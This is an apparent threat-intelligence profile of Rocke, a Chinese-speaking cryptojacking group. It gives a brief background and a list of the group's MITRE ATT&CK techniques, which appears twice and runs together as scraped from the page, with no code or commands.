Rocke
Aliases: None listed
Rocke is an alleged Chinese-speaking adversary whose primary objective appeared to be cryptojacking, or stealing victim system resources for the purposes of mining cryptocurrency. The name Rocke comes from the email address "rocke@live.cn" used to create the wallet which held collected cryptocurrency. Researchers have detected overlaps between Rocke and the Iron Cybercrime Group, though this attribution has not been confirmed.
Open interactive actor investigation
ATT&CK techniques
T1190
Exploit Public-Facing ApplicationT1014
RootkitT1027
Obfuscated Files or InformationT1102
Web ServiceT1562.004
Disable or Modify System FirewallT1059.004
Unix ShellT1082
System Information DiscoveryT1071
Application Layer ProtocolT1105
Ingress Tool TransferT1496.001
Compute HijackingT1027.004
Compile After DeliveryT1574.006
Dynamic Linker HijackingT1564.001
Hidden Files and DirectoriesT1053.003
CronT1059.006
PythonT1046
Network Service DiscoveryT1055.002
Portable Executable InjectionT1102.001
Dead Drop ResolverT1037
Boot or Logon Initialization ScriptsT1027.002
Software PackingT1070.002
Clear Linux or Mac System LogsT1547.001
Registry Run Keys / Startup FolderT1222.002
Linux and Mac File and Directory Permissions ModificationT1057
Process DiscoveryT1543.002
Systemd ServiceT1018
Remote System DiscoveryT1140
Deobfuscate/Decode Files or InformationT1562.001
Disable or Modify ToolsT1552.004
Private KeysT1070.004
File DeletionT1071.001
Web ProtocolsT1571
Non-Standard PortT1021.004
SSHT1070.006
TimestompT1036.005
Match Legitimate Name or LocationT1518.001
Security Software Discovery
Exploit Public-Facing ApplicationT1014
RootkitT1027
Obfuscated Files or InformationT1102
Web ServiceT1562.004
Disable or Modify System FirewallT1059.004
Unix ShellT1082
System Information DiscoveryT1071
Application Layer ProtocolT1105
Ingress Tool TransferT1496.001
Compute HijackingT1027.004
Compile After DeliveryT1574.006
Dynamic Linker HijackingT1564.001
Hidden Files and DirectoriesT1053.003
CronT1059.006
PythonT1046
Network Service DiscoveryT1055.002
Portable Executable InjectionT1102.001
Dead Drop ResolverT1037
Boot or Logon Initialization ScriptsT1027.002
Software PackingT1070.002
Clear Linux or Mac System LogsT1547.001
Registry Run Keys / Startup FolderT1222.002
Linux and Mac File and Directory Permissions ModificationT1057
Process DiscoveryT1543.002
Systemd ServiceT1018
Remote System DiscoveryT1140
Deobfuscate/Decode Files or InformationT1562.001
Disable or Modify ToolsT1552.004
Private KeysT1070.004
File DeletionT1071.001
Web ProtocolsT1571
Non-Standard PortT1021.004
SSHT1070.006
TimestompT1036.005
Match Legitimate Name or LocationT1518.001
Security Software Discovery